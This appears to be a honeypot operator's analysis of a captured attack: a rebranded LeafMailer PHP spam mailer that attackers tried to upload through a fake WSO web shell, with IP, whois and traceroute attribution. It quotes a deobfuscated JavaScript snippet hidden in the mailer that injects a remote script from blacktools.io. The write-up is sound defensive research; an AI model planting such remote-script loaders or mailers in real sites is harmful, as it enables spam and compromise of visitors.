A rebranded LeafMailer web email tool.
Apparently, the attacker(s) thought they were downloading to a WSO web shell.
My WordPress honey pot has a fairly full-featured WSO imitation,
so instead of a "FilesMAn"/"uploadFile" file transfer,
it ended up in my honey pot instead of as a file named blacktools.php
This download is actually part of a larger campaign.
No reverse lookup for 5.155.21.37,
but p0f3 has "Linux 2.2.x-3.x (no timestamps)" running that IP address.
whois says that IP address comes from Damascus, Syria.
I'm flattered. They're having a horrible war there.
inetnum: 5.155.0.0 - 5.155.127.255
netname: SY-ISP-TARASSUL
descr: Tarassul inetnet Service Provider
country: SY
created: 2014-09-13T13:34:02Z
last-modified: 2014-09-13T13:34:02Z
address: Syrian Telecommunication Est
address: Damascus, Syria
nic-hdl: AS4007-RIPE
created: 2010-03-10T10:43:10Z
last-modified: 2010-03-10T10:43:10Z
The traceroute seems weird.
I got different routes on different days of checking.
On 2018-10-17, the traceoute went through Hurricane Electric routers. The last two IP addresses that respond are:
- TenGE0-1-0-13.br02.ath01.pccwbtn.net (63.218.172.249)
- cyprus.te7-8.br03.ldn01.pccwbtn.net (63.218.34.58)
geoiplookup says those are in the USA, despite the "cyprus"
in the host name.
"pccwbtn.net" is a GoDaddy domain, although it appears to
be associated with PCCW Global (pccwglobal.com),
a mysterious "global service provider" out of Herndon, VA,
which runs AS3491.
63.218.172.249 and 63.218.34.58 are both in AS3491.
PCCW Global's website is pretty generic, I don't know what to think of it.
On 2018-10-19, the traceroute went through Cogent routers. The last two IP addreses that respond are:
- cyta.demarc.cogentco.com (149.14.126.34)
- depkapsalos-li-cust.cytanet.net (195.14.150.57)
cytanet.net apparently is a Cyprus company, although the
domain name is registered as a NetworkSolutions domain.
geoiplookup has the 195.14.150.57 address in Cyprus.
cytanet.net is apparently Cyprus Telecommuncations Authority.
The Ugarit submarine cable, owned by CYTA, runs from Pentaskhinos, Cyprus to Tartous, Syria. This is on the Greek side of Cyprus, CYTA appears to be a Greek-Cypriot thing. The northern, Turkish, side has 2 cables that run to mainland Turkey.
Whatever browser the attacker(s) used sent "ar,en-US;q=0.9,en;q=0.8,cs;q=0.7" as languages they accept. The "ar" arabic would seem to jibe with a Syrian attack.
The User Agent string "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" indicates the attackers used something other than Linux 2.2.x-3.x.
No deobfucation necessary: it was a cleartext download.
Blacktools PHP Mailer 3.0 is a copy of LeafMailer 2.7 with a lot more comments, probably because blacktools didn't feel confident stripping them out. Blacktools PHP Mailer does not have the phone-home that came with my honey pot's copy of LeafMailer.
There is one small piece of JavaScript added to Blacktools PHP Mailer. When deobfuscated it looks like this:
var _0xd00f=[
"<script src=https://blacktools.io/images/Style.js></script>",
"write"
];
document[_0xd00f[1]](_0xd00f[0]);
Looks like this retrieves Style.js from blacktools.io,
and injects it into the HTML document.
It's possible that this is just CSS, it's possible it does something wicked,
and it's possible that blacktools uses download attempts as some kind of
installation tracker or counter. Or it could be something else.
That URL just gave me 404 File Not Found, but blacktools.io did send a cookie:
__cfd=d956ef21ccf682ffd597a380c93b85
I tried wget, wget with a User Agent, and lynx, all earned me 404s.
The code claims that its website is blacktools.io.
Address: 104.27.171.124
Address: 104.27.170.124
Address: 2606:4700:30::681b:ab7c
Address: 2606:4700:30::681b:aa7c
That's a namecheap domain name. The IP addresses are CloudFlare cover-ups.
blacktools.io seems like a place to download script-kiddie tools:
